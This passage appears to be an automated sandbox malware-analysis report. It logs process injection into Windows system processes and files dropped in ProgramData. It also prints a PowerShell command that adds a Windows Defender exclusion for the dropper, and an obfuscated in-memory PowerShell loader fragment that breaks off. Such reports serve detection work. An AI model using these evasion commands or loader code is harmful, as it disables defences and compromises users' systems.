Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2256CFB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2C00000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 1E4E5CC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 282093A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1C891080000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1DF983B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1924DB90000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: F00000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2C00000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 8C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2A90000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2FB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: CB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: DC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2D40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 880000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: F60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 26A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D50000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D00000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2DA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2EA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2E90000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2EF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2B20000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2DB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: E10000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2B70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: E50000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1590000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 8E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: EC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: CF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 620000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2990000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 29F0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2F20000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2D40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2DC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 670000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D50000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1470000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 15C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 11C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D10000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2970000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 26A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 10E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: A90000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2380000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2BC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: B90000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 930000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 23A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1150000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D30000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: B20000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D50000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2A60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2A20000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: FB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 600000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: C80000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1460000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: DC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 11A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: E70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2C60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1290000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 9F0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2230000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2A90000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1170000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2880000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: B00000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\ProgramData\KrnlSetupSus.exe base: 1B7C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2153E9B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2C14A960000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 1BC83280000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28FAE000000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28FAE2E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 25C9D520000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 180CBB00000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 180CBB30000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 2BC5FFD0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\schtasks.exe base: 1E9DCC60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\schtasks.exe base: 1E9DCD80000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 25FC3320000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 19C14ED0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WerFault.exe base: 180F6450000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B9973D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 213A4CC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 20DF5510000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dllhost.exe base: 1FA39650000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dllhost.exe base: 1FB8E0E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\ProgramData\ntoskrnl.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\ProgramData\ntoskrnl.exe base: 900000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\ProgramData\ntoskrnl.exe base: 1B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\ProgramData\ntoskrnl.exe base: 400000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 25A16DF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 25A16E20000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 22382760000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B9973D0000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B9973F0000 (this row appears 11 times in the report)
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B998180000
Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\WerFault.exe base: 180F6460000 (this row appears 11 times in the report)
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 2D50000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 2D50000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 2D50000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 2D50000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 2D50000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 2D50000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 2D50000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 2D50000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 2D50000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 2D50000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 2D50000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\dwm.exe base: 26DB1610000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\dwm.exe base: 26DB15C0000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2FA1C0000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 209D2570000
                              Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\dwm.exe base: 26DB1560000
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Process created: C:\ProgramData\Install.exe "C:\ProgramData\Install.exe"
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Process created: C:\ProgramData\KrnlSetupSus.exe "C:\ProgramData\KrnlSetupSus.exe"
                              Source: C:\ProgramData\KrnlSetupSus.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe'
                              Source: C:\ProgramData\KrnlSetupSus.exe | Process created: unknown unknown (4 identical entries)
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{27f34893-8e1f-47b7-b44f-212b7709bf94}
                              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:zdgzeizuxwrl{param([outputtype([type])][parameter(position=0)][type[]]$lbrdggfzmoojsi,[parameter(position=1)][type]$iofhbohvyv)$rbujknkpjnm=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+[char](101)+''+'f'+'l'+'e'+''+'c'+''+[char](116)+''+[char](101)+''+'d'+''+[char](68)+''+[char](101)+'l'+'e'+''+[char](103)+''+[char](97)+'t'+'e'+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+'nm'+'e'+'m'+[char](111)+'r'+[char](121)+''+[char](77)+''+[char](111)+''+[char](100)+''+[char](117)+''+[char](108)+''+[char](101)+'',$false).definetype(''+[char](77)+''+'y'+'de'+[char](108)+''+'e'+''+[char](103)+'a'+'t'+''+'e'+'t'+[char](121)+''+[char](112)+''+[char](101)+'','c'+[char](108)+''+[char](97)+''+'s'+''+[char](115)+''+[char](44)+''+'p'+''+[char](117)+''+'b'+'l'+[char](105)+''+'c'+''+','+''+'s'+''+'e'+'a'+'l'+''+'e'+'d'+[char](44)+''+'a'+''+'n'+''+[char](115)+'ic'+[char](108)+''+[char](97)+''+[char](115)+''+[char](115)+''+[char](44)+''+[char](65)+''+'u'+''+'t'+'o'+[char](67)+''+'l'+'a'+[char](115)+''+[char](115)+'',[multicastdelegate]);$rbujknkpjnm.defineconstructor(''+'r'+''+[char](84)+''+[char](83)+''+[char](112)+'e'+[char](99)+''+[char](105)+''+'a'+''+[char](108)+'n'+'a'+''+'m'+'e'+[char](44)+'h'+'i'+''+[char](100)+''+[char](101)+''+'b'+''+[char](121)+''+[char](83)+''+[char](105)+''+[char](103)+''+[char](44)+'p'+'u'+'b'+[char](108)+''+[char](105)+''+[char](99)+'',[reflection.callingconventions]::standard,$lbrdggfzmoojsi).setimplementationflags(''+'r'+'u'+'n'+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+''+','+''+[char](77)+''+[char](97)+'n'+[char](97)+''+[char](103)+'e'+'d'+'');$rbujknkpjnm.definemethod(''+[char](73)+''+[char](110)+'voke','p'+[char](117)+''+[char](98)+''+[char](108)+''
+[char](105)+''+'c'+''+','+''+[char](72)+''+[char](105)+''+[char](100)+'e'+[char](66)+''+'y'+''+[char](83)+''+[char](105)+''+[char](103)+''+[char](44)+''+[char](78)+'e'+[char](119)+''+[char](83)+''+[char](108)+'o'+[char](116)+''+[char](44)+''+[char](86)+''+[char](105)+'r'+[char](116)+''+'u'+''+[char](97)+''+'l'+'',$iofhbohvyv,$lbrdggfzmoojsi).setimplementationflags(''+[char](82)+'un'+[char](116)+'ime'+','+''+[char](77)+'a'+'n'+''+[char](97)+''+'g'+''+'e'+''+[char](100)+'');write-output $rbujknkpjnm.createtype();}$ysqdxymchclna=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals('sys'+'t'+''+'e'+''+'m'+''+[char](46)+'d'+[char](108)+''+'l'+'')}).gettype('mi'+[char](99)+'r'+[char](111)+''+[char](115)+''+[char](111)+''+[char](102)+''+[char](116)+''+[char](46)+''+[char](87)+''+[char](105)+''+[char](110)+'3'+[char](50)+''+[char](46)+'u'+[char](110)+'s'+'a'+''+[char](102)+''+[char](101)+'nativ'+[char](101)+''+[char](77)+'e'+[char](116)+'h'+[char](111)+'d'+[char](115)+'');$exdfvzsyxbumyj=
                              Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_0000000140002390 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 6_2_0000000140002390 (2 identical entries)
                              Source: dwm.exe, 0000000C.00000000.1472720210.0000026DAA594000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000000C.00000002.2851619021.0000026DAA594000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
                              Source: winlogon.exe, 00000007.00000000.1458464003.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000002.2802270805.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000C.00000000.1474064783.0000026DAAB41000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                              Source: winlogon.exe, 00000007.00000000.1458464003.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000002.2802270805.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000C.00000000.1474064783.0000026DAAB41000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                              Source: winlogon.exe, 00000007.00000000.1458464003.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000002.2802270805.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000C.00000000.1474064783.0000026DAAB41000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: 0Program Manager
                              Source: winlogon.exe, 00000007.00000000.1458464003.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000007.00000002.2802270805.000002E991B70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000C.00000000.1474064783.0000026DAAB41000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock

                              Language, Device and Operating System Detection

                              Source: Yara match | File source: C:\ProgramData\ntoskrnl.exe, type: DROPPED
                              Source: Yara match | File source: C:\ProgramData\KrnlSetupSus.exe, type: DROPPED
                              Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_1C5734B0 cpuid 3_2_1C5734B0
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Queries volume information: C:\Users\user\Desktop\RdLfpZY5A9.exe VolumeInformation
                              Source: C:\ProgramData\KrnlSetupSus.exe | Queries volume information: C:\ProgramData\KrnlSetupSus.exe VolumeInformation
